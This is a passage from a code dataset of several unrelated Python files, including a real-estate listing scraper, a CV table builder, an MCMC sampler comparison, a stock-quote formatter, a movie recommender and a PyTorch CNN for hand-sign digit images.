verify=verify_ssl)\n generated_url = response.history[0].url if response.history else response.url\n print(f\"--> get data from : {generated_url}\")\n json = response.json()\n except requests.exceptions.HTTPError as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n except Exception as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n if not json:\n return {\n 'next': None,\n 'data': formatted\n }\n\n parsed_url = urlparse(url)\n base_url = parsed_url.scheme + '://' + parsed_url.netloc\n url_queries = {}\n if parsed_url.query:\n url_queries = parse_qs(parsed_url.query)\n for k,v in url_queries.items():\n url_queries[k] = v[0]\n\n next_url = None\n last_page = json['last_page']\n page = url_queries['page'] if 'page' in url_queries else 1\n page = int(page)\n if page < int(last_page):\n page += 1\n url_queries['page'] = page\n url_params = urlencode(url_queries)\n next_url = f\"{base_url}{parsed_url.path}?{url_params}\"\n\n results = json['results'] if 'results' in json else []\n\n if not next_url and not results:\n print(json)\n\n country = ''\n currency = ''\n\n if 'realestate.com.kh' in base_url:\n country = 'Cambodia'\n currency = 'USD'\n elif 'hausples.com.pg' in base_url:\n country = 'Papua New Guinea'\n currency = 'PGK'\n\n for row in results:\n try:\n if not row['images']:\n continue\n\n listing_type = row['listing_type']\n headline = row['headline'].strip()\n if headline.startswith('\"') and headline.endswith('\"'):\n headline = headline[1:-1]\n description = headline\n image_url = row['images'][0]['url']\n price = row['display_price'] if listing_type in ['sale', 'sale/rent'] else row['display_rent']\n price = price.replace('K', '')\n\n listing = [\n row['id'],\n headline,\n base_url + row['url'],\n image_url,\n f\"{row['address']}\",\n description,\n f\"{price} {currency}\",\n row['category_name'],\n listing_type,\n f\"{row['title_img_alt']}\",\n f\"{row['address']}, {country}\"\n ''\n ]\n formatted.append(listing)\n except Exception as e:\n print('--------------------- begin : error ---------------------')\n print(e)\n for k,v in row.items():\n if k not in [\n 'id',\n 'headline_en',\n 'url',\n 'listing_type',\n 'bedrooms',\n 'bathrooms',\n 'images',\n 'price_min',\n 'rent_min',\n 'address_locality',\n 'address_subdivision',\n 'category_name',\n 'address_line_2'\n ]:\n continue\n print(f\"{k} : {v}\")\n print('--------------------- end : error ---------------------')\n\n print(f\"...{len(formatted):,} data read\")\n\n return {\n 'next': next_url,\n 'data': formatted\n }\n\n\ndef extract_json(url, data={}, others={}, verify_ssl=True) -> dict:\n if \"/api/portal/pages/results\" in url:\n return extract_json_appr(url, data, others, verify_ssl)\n return extract_json_al(url, data, others, verify_ssl)\n\n\ndef extract_json_detail_al(url, verify_ssl=True, fields=[]) -> dict:\n formatted = []\n json = None\n try:\n response = requests.request('GET', url=url, headers=_headers, verify=verify_ssl)\n generated_url = response.history[0].url if response.history else response.url\n print(f\"--> get data from : {generated_url}\")\n json = response.json()\n except requests.exceptions.HTTPError as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n except Exception as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n if not json:\n return {\n 'data': formatted\n }\n\n row = json\n\n if not json:\n print(row)\n\n parsed_url = urlparse(url)\n base_url = parsed_url.scheme + '://' + parsed_url.netloc\n\n country = ''\n currency = ''\n\n if 'realestate.com.kh' in 
base_url:\n country = 'Cambodia'\n currency = 'USD'\n elif 'hausples.com.pg' in base_url:\n country = 'Papua New Guinea'\n currency = 'PGK'\n\n try:\n listing_type = row['listing_type']\n\n features = []\n if row['bedrooms']:\n features.append(f\"{row['bedrooms']} bed\")\n if row['bathrooms']:\n features.append(f\"{row['bathrooms']} bath\")\n headline = row['headline_en'].strip()\n if headline.startswith('\"') and headline.endswith('\"'):\n headline = headline[1:-1]\n description = row['description_en']\n if features:\n description += ' -> Features : '\n description += ', '.join(features)\n image_url = row['images'][0]['url'] if row['images'] else ''\n price = row['price_min'] if row['listing_type'] in ['sale', 'sale/rent'] else row['rent_min']\n if price:\n price = f\"{price:,} {currency}\"\n\n is_project = len(row['nested']) > 0\n\n if fields:\n for f in fields:\n if f == 'id':\n formatted.append(row['id'])\n elif f == 'headline':\n formatted.append(headline)\n elif f == 'front_url':\n formatted.append(base_url + row['url'])\n elif f == 'image':\n formatted.append(image_url)\n elif f == 'description':\n formatted.append(description)\n elif f == 'price':\n formatted.append(price)\n elif f == 'category':\n formatted.append(row['category_name'])\n elif f == 'listing_type':\n formatted.append(listing_type)\n elif f == 'address':\n formatted.append(f\"{row['address_locality']}, {row['address_subdivision']}, {country}\")\n elif f == 'country':\n formatted.append(country)\n elif f == 'city':\n formatted.append(row['address_subdivision'])\n elif f == 'district':\n formatted.append(row['address_locality'])\n elif f == 'commune':\n formatted.append(row['address_line_2'])\n elif f == 'street_name':\n formatted.append(row['address_line_1'])\n elif f == 'latitude':\n formatted.append(row['address_latitude'])\n elif f == 'longitude':\n formatted.append(row['address_longitude'])\n elif f == 'back_url':\n id = row['id']\n path = 'projectlisting' if is_project else 'listing'\n formatted.append(f\"{base_url}/wagtail-admin/listings/{path}/edit/{id}/#tab-location\")\n else:\n formatted.append('-unknown key-')\n else:\n formatted = [\n row['id'],\n headline,\n base_url + row['url'],\n image_url,\n f\"{row['address_locality']}, {row['address_subdivision']}\",\n description,\n price,\n row['category_name'],\n listing_type,\n f\"{headline} for {listing_type} in {row['address_line_2']} ID {row['id']}\",\n f\"{row['address_locality']}, {row['address_subdivision']}, {country}\",\n is_project,\n ]\n except Exception as e:\n print('--------------------- begin : error ---------------------')\n print(e)\n print('--------------------- end : error ---------------------')\n\n return {\n 'data': formatted\n }\n\n\ndef write_to_csv(filename='exported/export.csv', csv_data=[], mode='w', csv_head=[]):\n with open(CWD + filename, mode, encoding='utf-8', newline='') as f:\n writer = csv.writer(f, delimiter=',', lineterminator='\\r\\n', quoting=csv.QUOTE_NONNUMERIC)\n if not csv_head:\n csv_head = CSV_HEAD_DEFAULT\n if mode == 'w':\n writer.writerow(csv_head)\n writer.writerows(csv_data)\n print(f\"...{len(csv_data):,} data writen\")\n\n\ndef init_google_spreadsheet(spreadsheet_name=''):\n try:\n google_spread = gspread.service_account(filename=CWD + 'google-service.json')\n return google_spread.open(spreadsheet_name)\n except Exception as e:\n print(f'Error : {e}')\n return None\n\n\ndef write_to_gsheet(spreadsheet, sheet_name='Feed1', csv_data=[], mode='w'):\n if not spreadsheet:\n print(\"Error : spreadsheet not initialized 
yet\")\n return\n\n try:\n worksheet = spreadsheet.worksheet(sheet_name)\n if mode == 'w':\n worksheet.clear()\n head_df = pd.DataFrame([CSV_HEAD_DEFAULT])\n worksheet.update(head_df.values.tolist())\n csv_df = pd.DataFrame(csv_data)\n worksheet.append_rows(csv_df.values.tolist())\n print(f\"...{len(csv_data):,} data writen\")\n except Exception as e:\n print(f'Error : {e}')\n\n\ndef send_mail_notif(title='', body=''):\n sender_address = os.getenv('MAIL_USERNAME')\n sender_pass = os.getenv('MAIL_PASSWORD')\n receiver_address = os.getenv('MAIL_TO').split(',')\n mail_host = os.getenv('MAIL_HOST')\n mail_port = os.getenv('MAIL_PORT')\n\n message = MIMEMultipart('alternative')\n message['From'] = sender_address\n message['To'] = ','.join(receiver_address)\n message['Subject'] = title\n message.attach(MIMEText(format_body_html(body), 'html'))\n\n session = smtplib.SMTP(mail_host, mail_port)\n session.ehlo()\n session.starttls()\n session.login(sender_address, sender_pass)\n session.sendmail(sender_address, receiver_address, message.as_string())\n session.quit()\n\n print('~~~~~~~~~Mail Sent~~~~~~~~~')\n\n\ndef format_body_html(body=''):\n return f' \\\n \\\n \\\n {body} \\\n '","repo_name":"ahmadharminto/python-export-json-to-csv","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"4794123760","text":"import os\nimport json\nimport pandas as pd\n\ndef parse_cv(cv_text):\n cv = json.loads(cv_text)\n\n info_basique = cv[\"info_basique\"]\n nom_complet = info_basique[\"nom_complet\"]\n email = info_basique[\"email\"]\n linkedin_url = info_basique[\"linkedin_url\"]\n niveau_education = info_basique[\"niveau_education\"]\n université = info_basique[\"université\"]\n annee_de_diplomation = info_basique[\"annee_de_diplomation\"]\n\n experiences = cv[\"experience_professionnelle\"]\n postes = []\n for i in range(5): # Nous allons itérer 5 fois, car nous avons au maximum 5 expériences\n if i < len(experiences):\n exp = experiences[i]\n titre_du_poste = exp[\"titre_du_poste\"]\n entreprise = exp[\"entreprise\"]\n durée = exp[\"durée\"]\n postes.extend([titre_du_poste, entreprise, durée])\n else:\n postes.extend([None, None, None]) # Si nous n'avons pas d'expérience à cet indice, nous ajoutons None pour les trois valeurs\n\n return [nom_complet, email, linkedin_url, niveau_education, université, annee_de_diplomation, *postes]\n\ndata = []\n\ndirectory = 'CV_parsed'\nfor filename in os.listdir(directory):\n if filename.endswith(\".txt\"):\n with open(os.path.join(directory, filename), 'r') as file:\n cv_text = file.read()\n filename_without_extension = os.path.splitext(filename)[0]\n data.append([filename_without_extension] + parse_cv(cv_text)) # Nous ajoutons le nom du fichier au début de chaque ligne\n\ndf = pd.DataFrame(data, columns=[\"nom_fichier\", \"nom_complet\", \"email\", \"linkedin_url\", \"niveau_education\", \"université\", \"annee_de_diplomation\", \n \"poste 1\", \"entreprise 1\", \"durée 1\", \n \"poste 2\", \"entreprise 2\", \"durée 2\", \n \"poste 3\", \"entreprise 3\", \"durée 3\", \n \"poste 4\", \"entreprise 4\", \"durée 4\", \n \"poste 5\", \"entreprise 5\", \"durée 5\"])\n\nprint(os.getcwd())\ndf.to_excel(\"cvs.xlsx\", 
index=False)\n\n","repo_name":"hmikkos/resume-semantic-search","sub_path":"TableConstructor.py","file_name":"TableConstructor.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"72810385645","text":"from cPickle import dump, load\nfrom matplotlib.pyplot import plot, show, legend\nfrom numpy import zeros, fill_diagonal, asarray, arange, sqrt, linspace\nimport numpy\nfrom numpy.random import rand, randn, randint\nimport time\n\nfrom kameleon_mcmc.distribution.Hopfield import Hopfield\nfrom kameleon_mcmc.distribution.full_conditionals.HopfieldFullConditionals import HopfieldFullConditionals\nfrom kameleon_mcmc.kernel.HypercubeKernel import HypercubeKernel\nfrom kameleon_mcmc.mcmc.MCMCChain import MCMCChain\nfrom kameleon_mcmc.mcmc.MCMCParams import MCMCParams\nfrom kameleon_mcmc.mcmc.output.StatisticsOutput import StatisticsOutput\nfrom kameleon_mcmc.mcmc.samplers.DiscreteKameleon import DiscreteKameleon\nfrom kameleon_mcmc.mcmc.samplers.Gibbs import Gibbs\nfrom kameleon_mcmc.mcmc.samplers.StandardMetropolisDiscrete import StandardMetropolisDiscrete\n\n\ndef create_ground_truth():\n filename_chain = \"chain.bin\"\n filename_Z = \"Z.bin\"\n filename_hopfield = \"hopfield.bin\"\n \n try:\n f = open(filename_Z, \"r\")\n Z = load(f)\n f.close()\n \n f = open(filename_hopfield, \"r\")\n hopfield = load(f)\n f.close()\n print(\"Loaded existing ground truth samples and hopfield netword.\")\n except IOError:\n print(\"No existing ground truth samples. Creating.\")\n \n # the network to sample from\n try:\n f = open(filename_hopfield, \"r\")\n hopfield = load(f)\n f.close()\n d = hopfield.dimension\n print(\"Loaded hopfield network\")\n except IOError:\n d = 50\n b = randn(d)\n V = randn(d, d)\n W = V + V.T\n fill_diagonal(W, zeros(d))\n hopfield = Hopfield(W, b)\n \n # dump hopfield network\n f = open(filename_hopfield, \"w\")\n dump(hopfield, f)\n f.close()\n \n # iterations\n num_iterations = 10000000\n warm_up = 100000\n thin = 2000\n \n current_state = [rand() < 0.5 for _ in range(d)]\n distribution = HopfieldFullConditionals(full_target=hopfield,\n current_state=current_state,\n schedule=\"random_permutation\")\n mcmc_sampler = Gibbs(distribution)\n# spread = .0001\n# mcmc_sampler = StandardMetropolisDiscrete(hopfield, spread)\n \n mcmc_params = MCMCParams(start=asarray(current_state, dtype=numpy.bool8), num_iterations=num_iterations)\n chain = MCMCChain(mcmc_sampler, mcmc_params)\n \n chain.append_mcmc_output(StatisticsOutput(plot_times=True, lag=1000))\n # chain.append_mcmc_output(StoreChainOutput(\".\", lag=100000))\n \n # chain.append_mcmc_output(DiscretePlottingOutput(plot_from=0, lag=100))\n chain.run()\n \n # dump chain\n try:\n f = open(filename_chain, \"w\")\n dump(chain, f)\n f.close()\n except IOError:\n print(\"Could not save MCMC chain\")\n \n # warmup and thin\n Z = chain.samples[(warm_up):]\n Z = Z[arange(len(Z), step=thin)]\n Z = Z.astype(numpy.bool8)\n \n # dump ground truth samples\n try:\n f = open(filename_Z, \"w\")\n dump(Z, f)\n f.close()\n except IOError:\n print(\"Could not save Z\")\n \n return Z, hopfield\n\ndef run_kameleon_chain(Z, hopfield, start, num_iterations):\n threshold = 0.8\n spread = 0.03\n gamma = 0.2\n kernel = HypercubeKernel(gamma)\n sampler = DiscreteKameleon(hopfield, kernel, Z, threshold, spread)\n params = MCMCParams(start=start, num_iterations=num_iterations)\n chain = MCMCChain(sampler, params)\n chain.run()\n \n return chain\n\ndef 
run_gibbs_chain(hopfield, start, num_iterations):\n d = hopfield.dimension\n current_state = [x for x in start]\n distribution = HopfieldFullConditionals(full_target=hopfield,\n current_state=current_state)\n sampler = Gibbs(distribution)\n params = MCMCParams(start=asarray(current_state, dtype=numpy.bool8), num_iterations=num_iterations * d)\n chain = MCMCChain(sampler, params)\n chain.append_mcmc_output(StatisticsOutput(plot_times=True, lag=1000))\n chain.run()\n \n return chain\n\ndef run_sm_chain(hopfield, start, num_iterations):\n current_state = [x for x in start]\n spread = 0.03\n sampler = StandardMetropolisDiscrete(hopfield, spread)\n params = MCMCParams(start=asarray(current_state, dtype=numpy.bool8), num_iterations=num_iterations)\n chain = MCMCChain(sampler, params)\n chain.append_mcmc_output(StatisticsOutput(plot_times=True, lag=1000))\n chain.run()\n \n return chain\n\ndef main():\n Z, hopfield = create_ground_truth()\n d = hopfield.dimension\n \n print(\"Number of ground truth samples: %d\" % len(Z))\n\n num_iterations = 200000\n warm_up = 1000\n thin = 100\n \n start = randint(0, 2, d).astype(numpy.bool8)\n timestring = time.strftime(\"%Y-%m-%d_%H:%M:%S\")\n\n print(\"Running SM for %d iterations\" % num_iterations)\n sm_chain = run_sm_chain(hopfield, start, num_iterations)\n try:\n fname = \"temp_sm_result_\" + timestring + \".bin\"\n f = open(fname, \"w\")\n dump(sm_chain, f)\n f.close()\n except IOError:\n print(\"Could not save this SM chain\")\n\n print(\"Running Gibbs for %d iterations\" % (num_iterations * d))\n gibbs_chain = run_gibbs_chain(hopfield, start, num_iterations)\n try:\n fname = \"temp_gibbs_result_\" + timestring + \".bin\"\n f = open(fname, \"w\")\n dump(gibbs_chain, f)\n f.close()\n except IOError:\n print(\"Could not save this Gibbs chain\")\n \n print(\"Running Discrete Kameleon for %d iterations\" % num_iterations)\n kameleon_chain = run_kameleon_chain(Z, hopfield, start, num_iterations)\n try:\n fname = \"temp_kameleon_result_\" + timestring + \".bin\"\n f = open(fname, \"w\")\n dump(kameleon_chain, f)\n f.close()\n except IOError:\n print(\"Could not save this Kameleon chain\")\n \n \n # remove warm up and thin\n print(\"Removing warm up and thinning\")\n S_g = gibbs_chain.samples[warm_up:]\n S_g = S_g[arange(len(S_g), step=thin * d)].astype(numpy.bool8)\n S_k = kameleon_chain.samples[warm_up:]\n S_k = S_k[arange(len(S_k), step=thin)].astype(numpy.bool8)\n S_sm = sm_chain.samples[warm_up:]\n S_sm = S_sm[arange(len(S_sm), step=thin)].astype(numpy.bool8)\n print(\"Gibbs samples: %d\" % len(S_g))\n print(\"Kameleon samples: %d\" % len(S_k))\n print(\"SM samples: %d\" % len(S_sm))\n \n \n print(\"MMDs:\")\n kernel = HypercubeKernel(0.2)\n \n num_evaluations = 10\n inds_g = linspace(0, len(S_g), num_evaluations).astype(numpy.int)\n inds_k = linspace(0, len(S_k), num_evaluations).astype(numpy.int)\n inds_sm = linspace(0, len(S_sm), num_evaluations).astype(numpy.int)\n mmds = zeros((3, num_evaluations - 1))\n for i in arange(num_evaluations - 1):\n mmds[0, i - 1] = sqrt(kernel.estimateMMD(S_g[:inds_g[i + 1]], Z))\n mmds[1, i - 1] = sqrt(kernel.estimateMMD(S_k[:inds_k[i + 1]], Z))\n mmds[2, i - 1] = sqrt(kernel.estimateMMD(S_sm[:inds_sm[i + 1]], Z))\n \n \n print(mmds)\n plot(inds_g[1:], mmds[0, :])\n plot(inds_k[1:], mmds[1, :])\n plot(inds_sm[1:], mmds[2, :])\n legend([\"Gibbs\", \"Kameleon\", \"SM\"])\n show()\n \n \nif __name__ == '__main__':\n 
main()\n","repo_name":"karlnapf/kameleon-mcmc","sub_path":"kameleon_mcmc/tests/discrete/initial_comparison_discrete.py","file_name":"initial_comparison_discrete.py","file_ext":"py","file_size_in_byte":7514,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"2"} +{"seq_id":"41734637621","text":"# Configuration settings for your blockchain project\n\n# Network port for the Flask app\nFLASK_PORT = 5000\n\n# Mining difficulty level (adjust as needed)\nMINING_DIFFICULTY = 4 # Adjust for your requirements\n\n# Mining reward for miners (in your cryptocurrency)\nMINING_REWARD = 1.0 # Example: 1 unit of your cryptocurrency\n\n# Genesis block data\nGENESIS_DATA = {\n    'index': 1,\n    'previous_hash': '0',\n    'timestamp': 0,\n    'transactions': [],\n    'proof': 100,\n}\n","repo_name":"Aayush518/FormalChain","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2866192602","text":"from datetime import timedelta, datetime\r\n\r\n#ref: http://twstock.readthedocs.io/zh_TW/latest/quickstart.html#id2\r\nimport twstock\r\n\r\nimport matplotlib\r\n\r\ndef stocksFind(text):\r\n    matplotlib.use('Agg') # ref: https://matplotlib.org/faq/howto_faq.html\r\n    content = ''\r\n\r\n    stock_rt = twstock.realtime.get(text)\r\n    my_datetime = datetime.fromtimestamp(stock_rt['timestamp'] + 8 * 60 * 60)\r\n    my_time = my_datetime.strftime('%H:%M:%S')\r\n\r\n    content += '%s (%s) %s\\n' % (\r\n        stock_rt['info']['name'],\r\n        stock_rt['info']['code'],\r\n        my_time)\r\n    content += '現價: %s / 開盤: %s\\n' % (\r\n        stock_rt['realtime']['latest_trade_price'],\r\n        stock_rt['realtime']['open'])\r\n    content += '最高: %s / 最低: %s\\n' % (\r\n        stock_rt['realtime']['high'],\r\n        stock_rt['realtime']['low'])\r\n    content += '量: %s\\n' % (stock_rt['realtime']['accumulate_trade_volume'])\r\n\r\n    stock = twstock.Stock(text) # twstock.Stock('2330')\r\n    content += '-----\\n'\r\n    content += '最近五日價格: \\n'\r\n    price5 = stock.price[-5:][::-1]\r\n    date5 = stock.date[-5:][::-1]\r\n    for i in range(len(price5)):\r\n        # content += '[%s] %s\\n' %(date5[i].strftime(\"%Y-%m-%d %H:%M:%S\"), price5[i])\r\n        content += '[%s] %s\\n' % (date5[i].strftime(\"%Y-%m-%d\"), price5[i])\r\n\r\n    return content\r\n\r\n#a = stocksFind()\r\n#print(a)","repo_name":"michelle4232/final_s1073349","sub_path":"stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12322780090","text":"# recommend3.py -> recommendation 3 main file: fetches movies that the user's favorite actor appeared in\nfrom pandas import read_csv\nimport sys\n\ndef process(fActor):\n    random_num = []\n    df = read_csv('csv/movie_info.csv')\n    result_movie = \"\"\n    result_poster = \"\"\n    fActor2 = str(fActor).strip('\\n').strip('\\n')\n    for i in range(len(df)):\n        if(fActor2 in df['actor'][i]):\n            random_num.append(i)\n\n    count = 0\n    for i in range(len(random_num)):\n        if count<10:\n            result_movie += df['original_title'][random_num[i]] + \", \"\n            result_poster += df['poster_path'][random_num[i]] + \", \"\n            count+=1\n\n    result_movie=result_movie.strip().strip(',')\n    result_poster=result_poster.strip().strip(',')\n\n    print(\"[\"+result_movie+\"],[\"+result_poster+\"]\")\n\nif __name__ == '__main__':\n    
process(sys.argv[1])\n","repo_name":"SeowonPark001/Allons-y-back","sub_path":"recommend/recommend3.py","file_name":"recommend3.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"70347516846","text":"import math\nimport numpy as np\n\n\ndef softmax(x):\n    return np.exp(x) / np.sum(np.exp(x))\n\n\nclass CurriculumScheduler:\n    def __init__(self, start, stop, step_epoch, step_size=1) -> None:\n        assert start <= stop\n        self.start = start\n        self.stop = stop\n        self.step_epoch = step_epoch\n        self.step_size = step_size\n\n    def __call__(self, epoch):\n        tot_steps = max(math.floor((epoch - 1) / self.step_epoch), 0)\n        return min(self.start + tot_steps * self.step_size, self.stop)\n\n\nclass StochasticCurriculumScheduler:\n    def __init__(self, start, stop, stddev) -> None:\n        self.start = start\n        self.stop = stop\n        self.stddev = stddev\n        self.default_vector = np.arange(start=start, stop=stop + 1)\n        self.rng = np.random.default_rng(7337)\n\n    def __call__(self, epoch):\n        # calculate gaussian based on default vector\n        result_vector = (1 / (np.sqrt(2 * np.pi) * self.stddev)) * np.exp(\n            -(1 / 2) * ((self.default_vector - epoch) / self.stddev) ** 2\n        )\n        # apply softmax to result vector\n        result_probs = softmax(result_vector)\n        # sample index from result vector based on probabilities\n        sampled_size = self.rng.choice(self.default_vector, 1, p=result_probs)[0]\n        # return size\n        return sampled_size\n","repo_name":"dschaub95/rltsp","sub_path":"main_code/training/curriculum_scheduler.py","file_name":"curriculum_scheduler.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12324606685","text":"import requests\nfrom urllib3.util.retry import Retry\nfrom requests.adapters import HTTPAdapter\nfrom bs4 import BeautifulSoup\nimport os\n\ndef visit(url):\n    retries = Retry(total=5,backoff_factor=10, status_forcelist=[500,502,503,504])\n    headers = {\n        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',\n        'Accept-Language': 'zh-CN,zh;q=0.9,eo;q=0.8'\n    }\n    s = requests.Session()\n    s.mount('http://', HTTPAdapter(max_retries=retries))\n    response = s.get(url, headers=headers, stream=True)\n    return response\n#Get the web page title\ndef getTitle(url):\n    html = visit(url).text\n    soup = BeautifulSoup(html,'html.parser')\n    page_title = soup.find('title').text.replace(\" \",\"\").replace(\"\\n\",\"\").replace('Chinesehomemadevideo','')\n    return page_title\nif __name__ == '__main__':\n    test_url = 'https://google.com'\n    html = visit(test_url).text\n    #print(html)\n    title = getTitle(test_url)\n    print(title)\n\ndef delete(path):\n    if os.path.exists(path):\n        os.remove(path)\n    else:\n        print(\"The file does not exist\")\n","repo_name":"donfo22/mdowm","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73305382447","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport PlotFunctions as PF\r\nimport sklearn.metrics as metrics\r\nfrom torch.utils.data import DataLoader, Dataset\r\nfrom torch.autograd import Variable\r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n#Define Net 
class\r\nclass Net(nn.Module):\r\n\tdef __init__(self):\r\n\t\tsuper(Net, self).__init__()\r\n\t\tself.conv1 = nn.Conv2d(in_channels=1, out_channels=6, kernel_size=5) #60*60\r\n\t\tself.conv2 = nn.Conv2d(in_channels=6, out_channels=16, kernel_size=5) #Previous 2*2 pooling => 26*26\r\n\t\tself.nr_flat_features = 16 * 13 * 13 #Previous 2x2 pooling => 13x13\r\n\t\tself.fc1 = nn.Linear(self.nr_flat_features, 200)\r\n\t\tself.fc2 = nn.Linear(200, 120)\r\n\t\tself.fc3 = nn.Linear(120, 10)\r\n\t\t\r\n\t\t\r\n\tdef forward(self, x):\r\n\t\tout = F.max_pool2d(F.relu(self.conv1(x)),2) #30*30\r\n\t\tout = F.max_pool2d(F.relu(self.conv2(out)),2) #26*26\r\n\t\tout = out.view(-1,self.nr_flat_features) #Reshape into vector of (nr_channels=16, 13*13)\r\n\t\tout = self.fc3(F.relu(self.fc2(F.relu(self.fc1(out)))))\r\n\t\treturn out\r\n\r\n\t\r\n#A class to prepare our data for the DataLoader can be defined\r\n'''Any custom dataset class has to inherit from the PyTorch dataset Class.\r\nAlso, should have __len__ and __getitem__ atributes\r\nset. __init__ method allows to manipulate and transform our raw data'''\r\nclass prepData(Dataset):\r\n\tdef __init__(self, X, Y):\r\n\t\tX = X.reshape((-1,1,64,64)) #Add one channel to use convolution. first dimensions refers to number of images\r\n\t\ty_order = np.argsort([9,0,7,6,1,8,4,3,2,5])\r\n\t\tY = Y[:,y_order].argmax(axis=1) #Y is one hot encoded, thus needs to be converted to integer\r\n\t\tself.X = torch.from_numpy(X)\r\n\t\tself.Y = torch.from_numpy(Y)\r\n\t\t\r\n\tdef __len__(self):\r\n\t\t#Length of our data\r\n\t\treturn len(self.Y)\r\n\r\n\tdef __getitem__(self, idx):\r\n\t\t#Allows to get a sample from our dataset\r\n\t\tX = self.X[idx]\r\n\t\tY = self.Y[idx]\r\n\t\t\r\n\t\tsample = {'X': X, 'Y': Y}\r\n\t\treturn sample\r\n\r\n#Load the data and split it in train and test\r\nx_l = np.load('Data\\X.npy')\r\ny_l = np.load('Data\\Y.npy')\r\nx_train, x_test, y_train, y_test = train_test_split(x_l, y_l, test_size=0.2, random_state=42)\r\n\r\n#Transform our data into tensors to be read by our CNN and split it in shuffled batches\r\nbatch_size = 32\r\ntrainData = prepData(x_train, y_train)\r\ntrainDataL = DataLoader(trainData, batch_size=batch_size)\r\n\r\ntestData = prepData(x_test, y_test)\r\ntestDataL = DataLoader(testData, batch_size=batch_size)\r\n\r\nnet = Net()\r\ncriterion = nn.CrossEntropyLoss()\r\noptimizer = optim.Adam(net.parameters(), lr=0.001)\r\n\r\n#Initialize counters for accuracy and epoch\r\nacc_tr, loss_tr = [[],[]],[[],[]]\r\nstart_epoch = 0\r\n\r\n\r\n\r\n#Define procedure for training the network\r\ndef train(epoch):\r\n\tnet.train()\r\n\ttrain_loss = 0\r\n\tacc_meas = [0,0]\r\n\tb_id = 0\r\n\ttotal_sample, total_predictions = [], []\r\n\t\r\n\t#for each batch generated by DataLoader\r\n\tfor batch_id, sample in enumerate(trainDataL):\r\n\t\toptimizer.zero_grad() #Clear the gradients from our optimizer\r\n\t\t# inputs, targets = sample['X'], sample['Y']\r\n\t\toutputs = net(sample['X'])\r\n\t\tloss = criterion(outputs, sample['Y']) #Calculate the loss between predictions and targets\r\n\t\tloss.backward() #Get the gradient values\r\n\t\toptimizer.step() #Update the weights of the optimizer with the gradients calculated\r\n\t\t\r\n\t\ttrain_loss += loss.item() #add the loss of each batch to be able to calculate the overall loss\r\n\t\t_, predicted = torch.max(outputs.data, 1)\r\n\t\t\r\n\t\ttotal_sample += sample['Y'].tolist()\r\n\t\ttotal_predictions += predicted.tolist()\r\n\t\t\r\n\t\tacc_meas[1] += 
sample['Y'].size(0)\r\n\t\tacc_meas[0] += metrics.accuracy_score(sample['Y'], predicted, normalize=False)\r\n\t\tb_id += 1\r\n\t\r\n\tacc_tr[0].append(100. * acc_meas[0] / acc_meas[1])\r\n\tloss_tr[0].append(train_loss/(b_id))\r\n\tprint('TRAIN Epoch %d | Loss: %.3f | Acc: %.3f%% (%d/%d)' % (\r\n\t\tepoch, train_loss / (b_id), 100. * acc_meas[0] / acc_meas[1], acc_meas[0], acc_meas[1]))\r\n\tif epoch == 14:\r\n\t\tprint(metrics.classification_report(total_sample, total_predictions))\r\n\r\n\r\ndef test(epoch):\r\n\tnet.eval()\r\n\ttest_loss = 0\r\n\tacc_meas = [0, 0, 0]\r\n\tb_id = 0\r\n\t\r\n\t# for each batch generated by DataLoader\r\n\tfor batch_id, sample in enumerate(testDataL):\r\n\t\toutputs = net(sample['X'])\r\n\t\tloss = criterion(outputs, sample['Y']) # Calculate the loss between predictions and targets\r\n\t\t\r\n\t\ttest_loss += loss.item() # add the loss of each batch to be able to calculate the overall loss\r\n\t\t_, predicted = torch.max(outputs.data, 1)\r\n\t\tacc_meas[1] += sample['Y'].size(0)\r\n\t\tacc_meas[0] += metrics.accuracy_score(sample['Y'], predicted, normalize=False)\r\n\t\tb_id += 1\r\n\t\r\n\tacc_tr[1].append(100. * acc_meas[0] / acc_meas[1])\r\n\tloss_tr[1].append(test_loss/(b_id))\r\n\tprint('TEST Epoch %d | Loss: %.3f | Acc: %.3f%% (%d/%d)' % (\r\n\t\tepoch, test_loss / (b_id), 100. * acc_meas[0] / acc_meas[1], acc_meas[0], acc_meas[1]))\r\n\r\n\r\n\r\n\r\nnr_epochs=15\r\nfor epoch in range(start_epoch, start_epoch+nr_epochs):\r\n\ttrain(epoch)\r\n\ttest(epoch)\r\n\t\r\nt = np.arange(nr_epochs)\r\n\r\n'''\r\n#Plot accuracy and loss for train and test sets for each epoch\r\nfig, axes = plt.subplots(2,1)\r\nax1, ax2 = PF.two_y_axis(t,acc_tr[0],loss_tr[0], axes[0])\r\nax3, ax4 = PF.two_y_axis(t,acc_tr[1],loss_tr[1], axes[1])\r\n\r\n#Set axes and colors\r\nax1.set_ylabel('Accuracy', color='b')\r\nax1.tick_params('y', colors='b')\r\nax1.set_title('Accuracy and Loss for Train Set')\r\nax2.set_ylabel('Loss', 